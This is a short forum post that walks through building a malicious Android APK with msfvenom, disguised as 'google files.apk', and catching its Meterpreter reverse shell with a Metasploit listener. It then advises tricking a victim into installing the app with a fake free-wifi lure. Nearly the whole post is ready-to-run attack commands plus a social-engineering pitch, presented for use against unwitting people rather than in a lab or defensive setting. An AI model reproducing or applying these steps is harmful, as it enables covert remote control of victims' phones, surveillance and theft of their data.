Forum Thread: How to Remote Access a Android with PAYLOAD

First we needed to create a payload
we can do this by executing the following command in Kali linux Terminal

msfvenom -p android/meterpreter/reverse_tcp lhost=(your ip adress,get by typing ifconfig or sudo ifconfig in terminal) lport=4444 R > /home/kali/google files.apk

then open metasploit
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST (ip)
set LPORT 4444
exploit

now use social enginearing to make the victim download your app Example,
download the below app and run for 15 seconds to get access to free wifi lifetime
something.apk

when victim open the app after installing meterpreter session may open
and Enjoy :D

google for meterpreter commands to get full knowledge

----------------------------------------------------------------------------------------------------------------------------------------------------------------

this is my first article so
plz no hate Love only

PEACE BYE,

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active